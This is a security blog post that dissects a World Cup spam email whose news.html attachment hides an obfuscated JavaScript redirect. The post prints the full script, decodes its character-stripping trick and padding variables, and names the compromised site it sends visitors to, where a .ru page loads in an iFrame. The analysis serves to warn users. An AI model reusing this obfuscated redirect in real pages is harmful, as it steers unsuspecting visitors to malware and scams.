WARNING: DO NOT CLICK ANY LINKS IN THE BODY OF THIS POST
Ed. Since the time of writing, the website mentioned in the post has removed the files uploaded by the hackers running this scam. Please be aware that this is not the only site that has been exploited in this way, so please be careful.
Hello, are you enjoying the World Cup yet? Well, make sure it doesn't turn sour. As with all major events in recent times, spam emails are filling inboxes & junk boxes worldwide. I thought I would take the time to dissect one that seems to be hammering my junk filter at the moment. So let's take a look at the email.

Now with the big red strip across the top from the mail provider you would be forgiven for thinking you would need to be an idiot to open this, but alas, how many people open spam and click the links? Curiosity killed the cat & it is the same for users, especially with the promise of some sort of gossip or reward.
Anyway, the email instructs you to open news.html, which you would expect to contain the "bad news", but which in fact takes you to an exploited/hacked website. How does it do this? It uses a bit of JavaScript to redirect your browser.
<script type='text/javascript'>
function dX(){};
var h=new Date();
dX.prototype = {f : function() {
var u=function(){};var uY=new Date();var o="";var k=document;
var oE=function(){};var l='';this.i=33457;
var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')];
var w=function(){};var p=false;this.pP=false;this.s='';
kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')]='hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '');
var iK="iK";pK='';this.d="d";uM="";
}};
this.dK="";var fG=new dX(); var dR="dR";fG.f();hJ=false;
</script>
Now if you look at the code, it will be hard to spot the web address unless you know what you're looking for. Every .replace(/[...]/g, '') call in the script strips a set of filler characters out of a string, so 'l.oSc<a(t<i_oSnS' becomes "location", 'hGrGe>f>' becomes "href", and "hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ" becomes the web address http:// advancedwoodtech. com/ xnuej/ z.htm (spaces added to avoid the reader clicking the link). The rest of the variables (h, u, uY, o, oE, l, w, p, iK, pK, uM, dR, hJ) are never used; they are padding to make the script look like ordinary page code and to defeat simple signature matching. Put together, the script does nothing more than document.location.href = 'http://advancedwoodtech.com/xnuej/z.htm', sending your browser straight to the hacked website. The page it lands on opens a .ru (Russian) website inside an iFrame, which means the address bar may show what you expect while the content you are actually looking at comes from a totally different website altogether, one hosting malware and/or some scam. By the time the user realizes they have been misled the damage will have been done. Unfortunately not all mail providers will mark these mails as Spam, nor will all possible exploits by the end site be blocked by AntiVirus/Malware software (Ed. Not that most users will have up-to-date security software installed or even running, after all "that stupid firewall will not let me play games on facebook"), & of course there is the possibility of a scam which may convince the user to hand over personal details & maybe even some cash.
So there you go, now you know how an attachment in an email can lead to an infected PC, loss of cash & even I.D. theft. Although I have explained in brief how an email attack can function, please be aware that email is not the only way these people can run scams. Social media (Facebook, MySpace, Twitter) websites, hacked websites & spoof websites are all mediums scammers are actively using to rope in unwary users.